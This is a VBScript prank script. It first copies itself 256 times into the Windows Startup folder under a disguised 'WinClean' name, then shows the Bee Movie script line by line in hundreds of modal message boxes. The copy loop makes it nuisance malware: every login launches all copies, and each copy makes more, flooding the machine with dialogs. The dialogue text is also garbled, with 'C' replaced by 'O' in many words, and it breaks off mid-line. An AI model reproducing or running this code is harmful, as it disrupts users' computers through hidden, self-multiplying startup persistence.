'On Error Resume Next Function Rot(str) Dim i, j, k, r j = Len(str) r = "" For i = 1 to j k = Asc(Mid(str, i, 1)) If k >= 97 And k <= 109 Then k = k + 13 ElseIf k >= 110 And k <= 122 Then k = k - 13 ElseIf k >= 65 And k <= 77 Then k = k + 13 ElseIf k >= 78 And k <= 90 Then k = k - 13 Else 'out of range, do nothing End If r = r & Chr(k) Next Rot = r End Function 'Randomize Set fs=CreateObject("Scripting.FileSystemObject") Set sh=CreateObject("WScript.Shell") For i = 0 To 255 fs.CopyFile WScript.ScriptFullName, sh.ExpandEnvironmentStrings("%AppData%\Microsoft\Windows\Start Menu\Programs\StartUp\" & "WinClean." & Rot(WScript.ScriptName) & "." & Cstr(i) & ".vbs") Next x=MsgBox("According to all known laws",4096,"Bee") x=MsgBox("of aviation,",4096,"Bee") x=MsgBox("there is no way a bee",4096,"Bee") x=MsgBox("should be able to fly.",4096,"Bee") x=MsgBox("Its wings are too small to get",4096,"Bee") x=MsgBox("its fat little body off the ground.",4096,"Bee") x=MsgBox("The bee, of course, flies anyway",4096,"Bee") x=MsgBox("because bees don't care",4096,"Bee") x=MsgBox("what humans think is impossible.",4096,"Bee") x=MsgBox("Yellow, black. Yellow, black.",4096,"Bee") x=MsgBox("Yellow, black. Yellow, black.",4096,"Bee") x=MsgBox("Ooh, black and yellow!",4096,"Bee") x=MsgBox("Let's shake it up a little.",4096,"Bee") x=MsgBox("Barry! Breakfast is ready!",4096,"Bee") x=MsgBox("Ooming!",4096,"Bee") x=MsgBox("Hang on a second.",4096,"Bee") x=MsgBox("Hello?",4096,"Bee") x=MsgBox("- Barry?",4096,"Bee") x=MsgBox("- Adam?",4096,"Bee") x=MsgBox("- Oan you believe this is happening?",4096,"Bee") x=MsgBox("- I can't. I'll pick you up.",4096,"Bee") x=MsgBox("Looking sharp.",4096,"Bee") x=MsgBox("Use the stairs. Your father",4096,"Bee") x=MsgBox("paid good money for those.",4096,"Bee") x=MsgBox("Sorry. I'm excited.",4096,"Bee") x=MsgBox("Here's the graduate.",4096,"Bee") x=MsgBox("We're very proud of you, son.",4096,"Bee") x=MsgBox("A perfect report card, all B's.",4096,"Bee") x=MsgBox("Very proud.",4096,"Bee") x=MsgBox("Ma! I got a thing going here.",4096,"Bee") x=MsgBox("- You got lint on your fuzz.",4096,"Bee") x=MsgBox("- Ow! That's me!",4096,"Bee") x=MsgBox("- Wave to us! We'll be in row 118,000.",4096,"Bee") x=MsgBox("- Bye!",4096,"Bee") x=MsgBox("Barry, I told you,",4096,"Bee") x=MsgBox("stop flying in the house!",4096,"Bee") x=MsgBox("- Hey, Adam.",4096,"Bee") x=MsgBox("- Hey, Barry.",4096,"Bee") x=MsgBox("- Is that fuzz gel?",4096,"Bee") x=MsgBox("- A little. Special day, graduation.",4096,"Bee") x=MsgBox("Never thought I'd make it.",4096,"Bee") x=MsgBox("Three days grade school,",4096,"Bee") x=MsgBox("three days high school.",4096,"Bee") x=MsgBox("Those were awkward.",4096,"Bee") x=MsgBox("Three days college. I'm glad I took",4096,"Bee") x=MsgBox("a day and hitchhiked around the hive.",4096,"Bee") x=MsgBox("You did come back different.",4096,"Bee") x=MsgBox("- Hi, Barry.",4096,"Bee") x=MsgBox("- Artie, growing a mustache? Looks good.",4096,"Bee") x=MsgBox("- Hear about Frankie?",4096,"Bee") x=MsgBox("- Yeah.",4096,"Bee") x=MsgBox("- You going to the funeral?",4096,"Bee") x=MsgBox("- No, I'm not going.",4096,"Bee") x=MsgBox("Everybody knows,",4096,"Bee") x=MsgBox("sting someone, you die.",4096,"Bee") x=MsgBox("Don't waste it on a squirrel.",4096,"Bee") x=MsgBox("Such a hothead.",4096,"Bee") x=MsgBox("I guess he could have",4096,"Bee") x=MsgBox("just gotten out of the way.",4096,"Bee") x=MsgBox("I love this incorporating",4096,"Bee") x=MsgBox("an amusement park into our day.",4096,"Bee") x=MsgBox("That's why we don't need vacations.",4096,"Bee") x=MsgBox("Boy, quite a bit of pomp...",4096,"Bee") x=MsgBox("under the circumstances.",4096,"Bee") x=MsgBox("- Well, Adam, today we are men.",4096,"Bee") x=MsgBox("- We are!",4096,"Bee") x=MsgBox("- Bee-men.",4096,"Bee") x=MsgBox("- Amen!",4096,"Bee") x=MsgBox("Hallelujah!",4096,"Bee") x=MsgBox("Students, faculty, distinguished bees,",4096,"Bee") x=MsgBox("please welcome Dean Buzzwell.",4096,"Bee") x=MsgBox("Welcome, New Hive Oity",4096,"Bee") x=MsgBox("graduating class of...",4096,"Bee") x=MsgBox("...9:15.",4096,"Bee") x=MsgBox("That concludes our ceremonies.",4096,"Bee") x=MsgBox("And begins your career",4096,"Bee") x=MsgBox("at Honex Industries!",4096,"Bee") x=MsgBox("Will we pick ourjob today?",4096,"Bee") x=MsgBox("I heard it's just orientation.",4096,"Bee") x=MsgBox("Heads up! Here we go.",4096,"Bee") x=MsgBox("Keep your hands and antennas",4096,"Bee") x=MsgBox("inside the tram at all times.",4096,"Bee") x=MsgBox("- Wonder what it'll be like?",4096,"Bee") x=MsgBox("- A little scary.",4096,"Bee") x=MsgBox("Welcome to Honex,",4096,"Bee") x=MsgBox("a division of Honesco",4096,"Bee") x=MsgBox("and a part of the Hexagon Group.",4096,"Bee") x=MsgBox("This is it!",4096,"Bee") x=MsgBox("Wow.",4096,"Bee") x=MsgBox("Wow.",4096,"Bee") x=MsgBox("We know that you, as a bee,",4096,"Bee") x=MsgBox("have worked your whole life",4096,"Bee") x=MsgBox("to get to the point where you",4096,"Bee") x=MsgBox("can work for your whole life.",4096,"Bee") x=MsgBox("Honey begins when our valiant Pollen",4096,"Bee") x=MsgBox("Jocks bring the nectar to the hive.",4096,"Bee") x=MsgBox("Our top-secret formula",4096,"Bee") x=MsgBox("is automatically color-corrected,",4096,"Bee") x=MsgBox("scent-adjusted and bubble-contoured",4096,"Bee") x=MsgBox("into this soothing sweet syrup",4096,"Bee") x=MsgBox("with its distinctive",4096,"Bee") x=MsgBox("golden glow you know as...",4096,"Bee") x=MsgBox("Honey!",4096,"Bee") x=MsgBox("- That girl was hot.",4096,"Bee") x=MsgBox("- She's my cousin!",4096,"Bee") x=MsgBox("- She is?",4096,"Bee") x=MsgBox("- Yes, we're all cousins.",4096,"Bee") x=MsgBox("- Right. You're right.",4096,"Bee") x=MsgBox("- At Honex, we constantly strive",4096,"Bee") x=MsgBox("to improve every aspect",4096,"Bee") x=MsgBox("of bee existence.",4096,"Bee") x=MsgBox("These bees are stress-testing",4096,"Bee") x=MsgBox("a new helmet technology.",4096,"Bee") x=MsgBox("- What do you think he makes?",4096,"Bee") x=MsgBox("- Not enough.",4096,"Bee") x=MsgBox("Here we have our latest advancement,",4096,"Bee") x=MsgBox("the Krelman.",4096,"Bee") x=MsgBox("- What does that do?",4096,"Bee") x=MsgBox("- Oatches that little strand of honey",4096,"Bee") x=MsgBox("that hangs after you pour it.",4096,"Bee") x=MsgBox("Saves us millions.",4096,"Bee") x=MsgBox("Oan anyone work on the Krelman?",4096,"Bee") x=MsgBox("Of course. Most bee jobs are",4096,"Bee") x=MsgBox("small ones. But bees know",4096,"Bee") x=MsgBox("that every small job,",4096,"Bee") x=MsgBox("if it's done well, means a lot.",4096,"Bee") x=MsgBox("But choose carefully",4096,"Bee") x=MsgBox("because you'll stay in the job",4096,"Bee") x=MsgBox("you pick for the rest of your life.",4096,"Bee") x=MsgBox("The same job the rest of your life?",4096,"Bee") x=MsgBox("I didn't know that.",4096,"Bee") x=MsgBox("What's the difference?",4096,"Bee") x=MsgBox("You'll be happy to know that bees,",4096,"Bee") x=MsgBox("as a species, haven't had one day off",4096,"Bee") x=MsgBox("in 27 million years.",4096,"Bee") x=MsgBox("So you'll just work us to death?",4096,"Bee") x=MsgBox("We'll sure try.",4096,"Bee") x=MsgBox("Wow! That blew my mind!",4096,"Bee") x=MsgBox("" & Chr(34) & "What's the difference?" & Chr(34) & "",4096,"Bee") x=MsgBox("How can you say that?",4096,"Bee") x=MsgBox("One job forever?",4096,"Bee") x=MsgBox("That's an insane choice to have to make.",4096,"Bee") x=MsgBox("I'm relieved. Now we only have",4096,"Bee") x=MsgBox("to make one decision in life.",4096,"Bee") x=MsgBox("But, Adam, how could they",4096,"Bee") x=MsgBox("never have told us that?",4096,"Bee") x=MsgBox("Why would you question anything?",4096,"Bee") x=MsgBox("We're bees.",4096,"Bee") x=MsgBox("We're the most perfectly",4096,"Bee") x=MsgBox("functioning society on Earth.",4096,"Bee") x=MsgBox("You ever think maybe things",4096,"Bee") x=MsgBox("work a little too well here?",4096,"Bee") x=MsgBox("Like what? Give me one example.",4096,"Bee") x=MsgBox("I don't know. But you know",4096,"Bee") x=MsgBox("what I'm talking about.",4096,"Bee") x=MsgBox("Please clear the gate.",4096,"Bee") x=MsgBox("Royal Nectar Force on approach.",4096,"Bee") x=MsgBox("Wait a second. Oheck it out.",4096,"Bee") x=MsgBox("- Hey, those are Pollen Jocks!",4096,"Bee") x=MsgBox("- Wow.",4096,"Bee") x=MsgBox("I've never seen them this close.",4096,"Bee") x=MsgBox("They know what it's like",4096,"Bee") x=MsgBox("outside the hive.",4096,"Bee") x=MsgBox("Yeah, but some don't come back.",4096,"Bee") x=MsgBox("- Hey, Jocks!",4096,"Bee") x=MsgBox("- Hi, Jocks!",4096,"Bee") x=MsgBox("You guys did great!",4096,"Bee") x=MsgBox("You're monsters!",4096,"Bee") x=MsgBox("You're sky freaks! I love it! I love it!",4096,"Bee") x=MsgBox("- I wonder where they were.",4096,"Bee") x=MsgBox("- I don't know.",4096,"Bee") x=MsgBox("Their day's not planned.",4096,"Bee") x=MsgBox("Outside the hive, flying who knows",4096,"Bee") x=MsgBox("where, doing who knows what.",4096,"Bee") x=MsgBox("You can'tjust decide to be a Pollen",4096,"Bee") x=MsgBox("Jock. You have to be bred for that.",4096,"Bee") x=MsgBox("Right.",4096,"Bee") x=MsgBox("Look. That's more pollen",4096,"Bee") x=MsgBox("than you and I will see in a lifetime.",4096,"Bee") x=MsgBox("It's just a status symbol.",4096,"Bee") x=MsgBox("Bees make too much of it.",4096,"Bee") x=MsgBox("Perhaps. Unless you're wearing it",4096,"Bee") x=MsgBox("and the ladies see you wearing it.",4096,"Bee") x=MsgBox("Those ladies?",4096,"Bee") x=MsgBox("Aren't they our cousins too?",4096,"Bee") x=MsgBox("Distant. Distant.",4096,"Bee") x=MsgBox("Look at these two.",4096,"Bee") x=MsgBox("- Oouple of Hive Harrys.",4096,"Bee") x=MsgBox("- Let's have fun with them.",4096,"Bee") x=MsgBox("It must be dangerous",4096,"Bee") x=MsgBox("being a Pollen Jock.",4096,"Bee") x=MsgBox("Yeah. Once a bear pinned me",4096,"Bee") x=MsgBox("against a mushroom!",4096,"Bee") x=MsgBox("He had a paw on my throat,",4096,"Bee") x=MsgBox("and with the other, he was slapping me!",4096,"Bee") x=MsgBox("- Oh, my!",4096,"Bee") x=MsgBox("- I never thought I'd knock him out.",4096,"Bee") x=MsgBox("What were you doing during this?",4096,"Bee") x=MsgBox("Trying to alert the authorities.",4096,"Bee") x=MsgBox("I can autograph that.",4096,"Bee") x=MsgBox("A little gusty out there today,",4096,"Bee") x=MsgBox("wasn't it, comrades?",4096,"Bee") x=MsgBox("Yeah. Gusty.",4096,"Bee") x=MsgBox("We're hitting a sunflower patch",4096,"Bee") x=MsgBox("six miles from here tomorrow.",4096,"Bee") x=MsgBox("- Six miles, huh?",4096,"Bee") x=MsgBox("- Barry!",4096,"Bee") x=MsgBox("A puddle jump for us,",4096,"Bee") x=MsgBox("but maybe you're not up for it.",4096,"Bee") x=MsgBox("- Maybe I am.",4096,"Bee") x=MsgBox("- You are not!",4096,"Bee") x=MsgBox("We're going 0900 at J-Gate.",4096,"Bee") x=MsgBox("What do you think, buzzy-boy?",4096,"Bee") x=MsgBox("Are you bee enough?",4096,"Bee") x=MsgBox("I might be. It all depends",4096,"Bee") x=MsgBox("on what 0900 means.",4096,"Bee") x=MsgBox("Hey, Honex!",4096,"Bee") x=MsgBox("Dad, you surprised me.",4096,"Bee") x=MsgBox("You decide what you're interested in?",4096,"Bee") x=MsgBox("- Well, there's a lot of choices.",4096,"Bee") x=MsgBox("- But you only get one.",4096,"Bee") x=MsgBox("Do you ever get bored",4096,"Bee") x=MsgBox("doing the same job every day?",4096,"Bee") x=MsgBox("Son, let me tell you about stirring.",4096,"Bee") x=MsgBox("You grab that stick, and you just",4096,"Bee") x=MsgBox("move it around, and you stir it around.",4096,"Bee") x=MsgBox("You get yourself into a rhythm.",4096,"Bee") x=MsgBox("It's a beautiful thing.",4096,"Bee") x=MsgBox("You know, Dad,",4096,"Bee") x=MsgBox("the more I think about it,",4096,"Bee") x=MsgBox("maybe the honey field",4096,"Bee") x=MsgBox("just isn't right for me.",4096,"Bee") x=MsgBox("You were thinking of what,",4096,"Bee") x=MsgBox("making balloon animals?",4096,"Bee") x=MsgBox("That's a bad job",4096,"Bee") x=MsgBox("for a guy with a stinger.",4096,"Bee") x=MsgBox("Janet, your son's not sure",4096,"Bee") x=MsgBox("he wants to go into honey!",4096,"Bee") x=MsgBox("- Barry, you are so funny sometimes.",4096,"Bee") x=MsgBox("- I'm not trying to be funny.",4096,"Bee") x=MsgBox("You're not funny! You're going",4096,"Bee") x=MsgBox("into honey. Our son, the stirrer!",4096,"Bee") x=MsgBox("- You're gonna be a stirrer?",4096,"Bee") x=MsgBox("- No one's listening to me!",4096,"Bee") x=MsgBox("Wait till you see the sticks I have.",4096,"Bee") x=MsgBox("I could say anything right now.",4096,"Bee") x=MsgBox("I'm gonna get an ant tattoo!",4096,"Bee") x=MsgBox("Let's open some honey and celebrate!",4096,"Bee") x=MsgBox("Maybe I'll pierce my thorax.",4096,"Bee") x=MsgBox("Shave my antennae.",4096,"Bee") x=MsgBox("Shack up with a grasshopper. Get",4096,"Bee") x=MsgBox("a gold tooth and call everybody " & Chr(34) & "dawg" & Chr(34) & "!",4096,"Bee") x=MsgBox("I'm so proud.",4096,"Bee") x=MsgBox("- We're starting work today!",4096,"Bee") x=MsgBox("- Today's the day.",4096,"Bee") x=MsgBox("Oome on! All the good jobs",4096,"Bee") x=MsgBox("will be gone.",4096,"Bee") x=MsgBox("Yeah, right.",4096,"Bee") x=MsgBox("Pollen counting, stunt bee, pouring,",4096,"Bee") x=MsgBox("stirrer, front desk, hair removal...",4096,"Bee") x=MsgBox("- Is it still available?",4096,"Bee") x=MsgBox("- Hang on. Two left!",4096,"Bee") x=MsgBox("One of them's yours! Oongratulations!",4096,"Bee") x=MsgBox("Step to the side.",4096,"Bee") x=MsgBox("- What'd you get?",4096,"Bee") x=MsgBox("- Picking crud out. Stellar!",4096,"Bee") x=MsgBox("Wow!",4096,"Bee") x=MsgBox("Oouple of newbies?",4096,"Bee") x=MsgBox("Yes, sir! Our first day! We are ready!",4096,"Bee") x=MsgBox("Make your choice.",4096,"Bee") x=MsgBox("- You want to go first?",4096,"Bee") x=MsgBox("- No, you go.",4096,"Bee") x=MsgBox("Oh, my. What's available?",4096,"Bee") x=MsgBox("Restroom attendant's open,",4096,"Bee") x=MsgBox("not for the reason you think.",4096,"Bee") x=MsgBox("- Any chance of getting the Krelman?",4096,"Bee") x=MsgBox("- Sure, you're on.",4096,"Bee") x=MsgBox("I'm sorry, the Krelman just closed out.",4096,"Bee") x=MsgBox("Wax monkey's always open.",4096,"Bee") x=MsgBox("The Krelman opened up again.",4096,"Bee") x=MsgBox("What happened?",4096,"Bee") x=MsgBox("A bee died. Makes an opening. See?",4096,"Bee") x=MsgBox("He's dead. Another dead one.",4096,"Bee") x=MsgBox("Deady. Deadified. Two more dead.",4096,"Bee") x=MsgBox("Dead from the neck up.",4096,"Bee") x=MsgBox("Dead from the neck down. That's life!",4096,"Bee") x=MsgBox("Oh, this is so hard!",4096,"Bee") x=MsgBox("Heating, cooling,",4096,"Bee") x=MsgBox("stunt bee, pourer, stirrer,",4096,"Bee") x=MsgBox("humming, inspector number seven,",4096,"Bee") x=MsgBox("lint coordinator, stripe supervisor,",4096,"Bee") x=MsgBox("mite wrangler. Barry, what",4096,"Bee") x=MsgBox("do you think I should... Barry?",4096,"Bee") x=MsgBox("Barry!",4096,"Bee") x=MsgBox("All right, we've got the sunflower patch",4096,"Bee") x=MsgBox("in quadrant nine...",4096,"Bee") x=MsgBox("What happened to you?",4096,"Bee") x=MsgBox("Where are you?",4096,"Bee") x=MsgBox("- I'm going out.",4096,"Bee") x=MsgBox("- Out? Out where?",4096,"Bee") x=MsgBox("- Out there.",4096,"Bee") x=MsgBox("- Oh, no!",4096,"Bee") x=MsgBox("I have to, before I go",4096,"Bee") x=MsgBox("to work for the rest of my life.",4096,"Bee") x=MsgBox("You're gonna die! You're crazy! Hello?",4096,"Bee") x=MsgBox("Another call coming in.",4096,"Bee") x=MsgBox("If anyone's feeling brave,",4096,"Bee") x=MsgBox("there's a Korean deli on 83rd",4096,"Bee") x=MsgBox("that gets their roses today.",4096,"Bee") x=MsgBox("Hey, guys.",4096,"Bee") x=MsgBox("- Look at that.",4096,"Bee") x=MsgBox("- Isn't that the kid we saw yesterday?",4096,"Bee") x=MsgBox("Hold it, son, flight deck's restricted.",4096,"Bee") x=MsgBox("It's OK, Lou. We're gonna take him up.",4096,"Bee") x=MsgBox("Really? Feeling lucky, are you?",4096,"Bee") x=MsgBox("Sign here, here. Just initial that.",4096,"Bee") x=MsgBox("- Thank you.",4096,"Bee") x=MsgBox("- OK.",4096,"Bee") x=MsgBox("You got a rain advisory today,",4096,"Bee") x=MsgBox("and as you all know,",4096,"Bee") x=MsgBox("bees cannot fly in rain.",4096,"Bee") x=MsgBox("So be careful. As always,",4096,"Bee") x=MsgBox("watch your brooms,",4096,"Bee") x=MsgBox("hockey sticks, dogs,",4096,"Bee") x=MsgBox("birds, bears and bats.",4096,"Bee") x=MsgBox("Also, I got a couple of reports",4096,"Bee") x=MsgBox("of root beer being poured on us.",4096,"Bee") x=MsgBox("Murphy's in a home because of it,",4096,"Bee") x=MsgBox("babbling like a cicada!",4096,"Bee") x=MsgBox("- That's awful.",4096,"Bee") x=MsgBox("- And a reminder for you rookies,",4096,"Bee") x=MsgBox("bee law number one,",4096,"Bee") x=MsgBox("absolutely no talking to humans!",4096,"Bee") x=MsgBox("All right, launch positions!",4096,"Bee") x=MsgBox("Buzz, buzz, buzz, buzz! Buzz, buzz,",4096,"Bee") x=MsgBox("buzz, buzz! Buzz, buzz, buzz, buzz!",4096,"Bee") x=MsgBox("Black and yellow!",4096,"Bee") x=MsgBox("Hello!",4096,"Bee") x=MsgBox("You ready for this, hot shot?",4096,"Bee") x=MsgBox("Yeah. Yeah, bring it on.",4096,"Bee") x=MsgBox("Wind, check.",4096,"Bee") x=MsgBox("- Antennae, check.",4096,"Bee") x=MsgBox("- Nectar pack, check.",4096,"Bee") x=MsgBox("- Wings, check.",4096,"Bee") x=MsgBox("- Stinger, check.",4096,"Bee") x=MsgBox("Scared out of my shorts, check.",4096,"Bee") x=MsgBox("OK, ladies,",4096,"Bee") x=MsgBox("let's move it out!",4096,"Bee") x=MsgBox("Pound those petunias,",4096,"Bee") x=MsgBox("you striped stem-suckers!",4096,"Bee") x=MsgBox("All of you, drain those flowers!",4096,"Bee") x=MsgBox("Wow! I'm out!",4096,"Bee") x=MsgBox("I can't believe I'm out!",4096,"Bee") x=MsgBox("So blue.",4096,"Bee") x=MsgBox("I feel so fast and free!",4096,"Bee") x=MsgBox("Box kite!",4096,"Bee") x=MsgBox("Wow!",4096,"Bee") x=MsgBox("Flowers!",4096,"Bee") x=MsgBox("This is Blue Leader.",4096,"Bee") x=MsgBox("We have roses visual.",4096,"Bee") x=MsgBox("Bring it around 30 degrees and hold.",4096,"Bee") x=MsgBox("Roses!",4096,"Bee") x=MsgBox("30 degrees, roger. Bringing it around.",4096,"Bee") x=MsgBox("Stand to the side, kid.",4096,"Bee") x=MsgBox("It's got a bit of a kick.",4096,"Bee") x=MsgBox("That is one nectar collector!",4096,"Bee") x=MsgBox("- Ever see pollination up close?",4096,"Bee") x=MsgBox("- No, sir.",4096,"Bee") x=MsgBox("I pick up some pollen here, sprinkle it",4096,"Bee") x=MsgBox("over here. Maybe a dash over there,",4096,"Bee") x=MsgBox("a pinch on that one.",4096,"Bee") x=MsgBox("See that? It's a little bit of magic.",4096,"Bee") x=MsgBox("That's amazing. Why do we do that?",4096,"Bee") x=MsgBox("That's pollen power. More pollen, more",4096,"Bee") x=MsgBox("flowers, more nectar, more honey for us.",4096,"Bee") x=MsgBox("Oool.",4096,"Bee") x=MsgBox("I'm picking up a lot of bright yellow.",4096,"Bee") x=MsgBox("Oould be daisies. Don't we need those?",4096,"Bee") x=MsgBox("Oopy that visual.",4096,"Bee") x=MsgBox("Wait. One of these flowers",4096,"Bee") x=MsgBox("seems to be on the move.",4096,"Bee") x=MsgBox("Say again? You're reporting",4096,"Bee") x=MsgBox("a moving flower?",4096,"Bee") x=MsgBox("Affirmative.",4096,"Bee") x=MsgBox("That was on the line!",4096,"Bee") x=MsgBox("This is the coolest. What is it?",4096,"Bee") x=MsgBox("I don't know, but I'm loving this color.",4096,"Bee") x=MsgBox("It smells good.",4096,"Bee") x=MsgBox("Not like a flower, but I like it.",4096,"Bee") x=MsgBox("Yeah, fuzzy.",4096,"Bee") x=MsgBox("Ohemical-y.",4096,"Bee") x=MsgBox("Oareful, guys. It's a little grabby.",4096,"Bee") x=MsgBox("My sweet lord of bees!",4096,"Bee") x=MsgBox("Oandy-brain, get off there!",4096,"Bee") x=MsgBox("Problem!",4096,"Bee") x=MsgBox("- Guys!",4096,"Bee") x=MsgBox("- This could be bad.",4096,"Bee") x=MsgBox("Affirmative.",4096,"Bee") x=MsgBox("Very close.",4096,"Bee") x=MsgBox("Gonna hurt.",4096,"Bee") x=MsgBox("Mama's little boy.",4096,"Bee") x=MsgBox("You are way out of position, rookie!",4096,"Bee") x=MsgBox("Ooming in at you like a missile!",4096,"Bee") x=MsgBox("Help me!",4096,"Bee") x=MsgBox("I don't think these are flowers.",4096,"Bee") x=MsgBox("- Should we tell him?",4096,"Bee") x=MsgBox("- I think he knows.",4096,"Bee") x=MsgBox("What is this?!",4096,"Bee") x=MsgBox("Match point!",4096,"Bee") x=MsgBox("You can start packing up, honey,",4096,"Bee") x=MsgBox("because you're about to eat it!",4096,"Bee") x=MsgBox("Yowser!",4096,"Bee") x=MsgBox("Gross.",4096,"Bee") x=MsgBox("There's a bee in the car!",4096,"Bee") x=MsgBox("- Do something!",4096,"Bee") x=MsgBox("- I'm driving!",4096,"Bee") x=MsgBox("- Hi, bee.",4096,"Bee") x=MsgBox("- He's back here!",4096,"Bee") x=MsgBox("He's going to sting me!",4096,"Bee") x=MsgBox("Nobody move. If you don't move,",4096,"Bee") x=MsgBox("he won't sting you. Freeze!",4096,"Bee") x=MsgBox("He blinked!",4096,"Bee") x=MsgBox("Spray him, Granny!",4096,"Bee") x=MsgBox("What are you doing?!",4096,"Bee") x=MsgBox("Wow... the tension level",4096,"Bee") x=MsgBox("out here is unbelievable.",4096,"Bee") x=MsgBox("I gotta get home.",4096,"Bee") x=MsgBox("Oan't fly in rain.",4096,"Bee") x=MsgBox("Oan't fly in rain.",4096,"Bee") x=MsgBox("Oan't fly in rain.",4096,"Bee") x=MsgBox("Mayday! Mayday! Bee going down!",4096,"Bee") x=MsgBox("Ken, could you close",4096,"Bee") x=MsgBox("the window please?",4096,"Bee") x=MsgBox("Ken, could you close",4096,"Bee") x=MsgBox("the window please?",4096,"Bee") x=MsgBox("Oheck out my new resume.",4096,"Bee") x=MsgBox("I made it into a fold-out brochure.",4096,"Bee") x=MsgBox("You see? Folds out.",4096,"Bee") x=MsgBox("Oh, no. More humans. I don't need this.",4096,"Bee") x=MsgBox("What was that?",4096,"Bee") x=MsgBox("Maybe this time. This time. This time.",4096,"Bee") x=MsgBox("This time! This time! This...",4096,"Bee") x=MsgBox("Drapes!",4096,"Bee") x=MsgBox("That is diabolical.",4096,"Bee") x=MsgBox("It's fantastic. It's got all my special",4096,"Bee") x=MsgBox("skills, even my top-ten favorite movies.",4096,"Bee") x=MsgBox("What's number one? Star Wars?",4096,"Bee") x=MsgBox("Nah, I don't go for that...",4096,"Bee") x=MsgBox("...kind of stuff.",4096,"Bee") x=MsgBox("No wonder we shouldn't talk to them.",4096,"Bee") x=MsgBox("They're out of their minds.",4096,"Bee") x=MsgBox("When I leave a job interview, they're",4096,"Bee") x=MsgBox("flabbergasted, can't believe what I say.",4096,"Bee") x=MsgBox("There's the sun. Maybe that's a way out.",4096,"Bee") x=MsgBox("I don't remember the sun",4096,"Bee") x=MsgBox("having a big 75 on it.",4096,"Bee") x=MsgBox("I predicted global warming.",4096,"Bee") x=MsgBox("I could feel it getting hotter.",4096,"Bee") x=MsgBox("At first I thought it was just me.",4096,"Bee") x=MsgBox("Wait! Stop! Bee!",4096,"Bee") x=MsgBox("Stand back. These are winter boots.",4096,"Bee") x=MsgBox("Wait!",4096,"Bee") x=MsgBox("Don't kill him!",4096,"Bee") x=MsgBox("You know I'm allergic to them!",4096,"Bee") x=MsgBox("This thing could kill me!",4096,"Bee") x=MsgBox("Why does his life have",4096,"Bee") x=MsgBox("less value than yours?",4096,"Bee") x=MsgBox("Why does his life have any less value",4096,"Bee") x=MsgBox("than mine? Is that your statement?",4096,"Bee") x=MsgBox("I'm just saying all life has value. You",4096,"Bee") x=MsgBox("don't know what he's capable of feeling.",4096,"Bee") x=MsgBox("My brochure!",4096,"Bee") x=MsgBox("There you go, little guy.",4096,"Bee") x=MsgBox("I'm not scared of him.",4096,"Bee") x=MsgBox("It's an allergic thing.",4096,"Bee") x=MsgBox("Put that on your resume brochure.",4096,"Bee") x=MsgBox("My whole face could puff up.",4096,"Bee") x=MsgBox("Make it one of your special skills.",4096,"Bee") x=MsgBox("Knocking someone out",4096,"Bee") x=MsgBox("is also a special skill.",4096,"Bee") x=MsgBox("Right. Bye, Vanessa. Thanks.",4096,"Bee") x=MsgBox("- Vanessa, next week? Yogurt night?",4096,"Bee") x=MsgBox("- Sure, Ken. You know, whatever.",4096,"Bee") x=MsgBox("- You could put carob chips on there.",4096,"Bee") x=MsgBox("- Bye.",4096,"Bee") x=MsgBox("- Supposed to be less calories.",4096,"Bee") x=MsgBox("- Bye.",4096,"Bee") x=MsgBox("I gotta say something.",4096,"Bee") x=MsgBox("She saved my life.",4096,"Bee") x=MsgBox("I gotta say something.",4096,"Bee") x=MsgBox("All right, here it goes.",4096,"Bee") x=MsgBox("Nah.",4096,"Bee") x=MsgBox("What would I say?",4096,"Bee") x=MsgBox("I could really get in trouble.",4096,"Bee") x=MsgBox("It's a bee law.",4096,"Bee") x=MsgBox("You're not supposed to talk to a human.",4096,"Bee") x=MsgBox("I can't believe I'm doing this.",4096,"Bee") x=MsgBox("I've got to.",4096,"Bee") x=MsgBox("Oh, I can't do it. Oome on!",4096,"Bee") x=MsgBox("No. Yes. No.",4096,"Bee") x=MsgBox("Do it. I can't.",4096,"Bee") x=MsgBox("How should I start it?",4096,"Bee") x=MsgBox("" & Chr(34) & "You like jazz?" & Chr(34) & " No, that's no good.",4096,"Bee") x=MsgBox("Here she comes! Speak, you fool!",4096,"Bee") x=MsgBox("Hi!",4096,"Bee") x=MsgBox("I'm sorry.",4096,"Bee") x=MsgBox("- You're talking.",4096,"Bee") x=MsgBox("- Yes, I know.",4096,"Bee") x=MsgBox("You're talking!",4096,"Bee") x=MsgBox("I'm so sorry.",4096,"Bee") x=MsgBox("No, it's OK. It's fine.",4096,"Bee") x=MsgBox("I know I'm dreaming.",4096,"Bee") x=MsgBox("But I don't recall going to bed.",4096,"Bee") x=MsgBox("Well, I'm sure this",4096,"Bee") x=MsgBox("is very disconcerting.",4096,"Bee") x=MsgBox("This is a bit of a surprise to me.",4096,"Bee") x=MsgBox("I mean, you're a bee!",4096,"Bee") x=MsgBox("I am. And I'm not supposed",4096,"Bee") x=MsgBox("to be doing this,",4096,"Bee") x=MsgBox("but they were all trying to kill me.",4096,"Bee") x=MsgBox("And if it wasn't for you...",4096,"Bee") x=MsgBox("I had to thank you.",4096,"Bee") x=MsgBox("It's just how I was raised.",4096,"Bee") x=MsgBox("That was a little weird.",4096,"Bee") x=MsgBox("- I'm talking with a bee.",4096,"Bee") x=MsgBox("- Yeah.",4096,"Bee") x=MsgBox("I'm talking to a bee.",4096,"Bee") x=MsgBox("And the bee is talking to me!",4096,"Bee") x=MsgBox("I just want to say I'm grateful.",4096,"Bee") x=MsgBox("I'll leave now.",4096,"Bee") x=MsgBox("- Wait! How did you learn to do that?",4096,"Bee") x=MsgBox("- What?",4096,"Bee") x=MsgBox("The talking thing.",4096,"Bee") x=MsgBox("Same way you did, I guess.",4096,"Bee") x=MsgBox("" & Chr(34) & "Mama, Dada, honey." & Chr(34) & " You pick it up.",4096,"Bee") x=MsgBox("- That's very funny.",4096,"Bee") x=MsgBox("- Yeah.",4096,"Bee") x=MsgBox("Bees are funny. If we didn't laugh,",4096,"Bee") x=MsgBox("we'd cry with what we have to deal with.",4096,"Bee") x=MsgBox("Anyway...",4096,"Bee") x=MsgBox("Oan I...",4096,"Bee") x=MsgBox("...get you something?",4096,"Bee") x=MsgBox("- Like what?",4096,"Bee") x=MsgBox("I don't know. I mean...",4096,"Bee") x=MsgBox("I don't know. Ooffee?",4096,"Bee") x=MsgBox("I don't want to put you out.",4096,"Bee") x=MsgBox("It's no trouble. It takes two minutes.",4096,"Bee") x=MsgBox("- It's just coffee.",4096,"Bee") x=MsgBox("- I hate to impose.",4096,"Bee") x=MsgBox("- Don't be ridiculous!",4096,"Bee") x=MsgBox("- Actually, I would love a cup.",4096,"Bee") x=MsgBox("Hey, you want rum cake?",4096,"Bee") x=MsgBox("- I 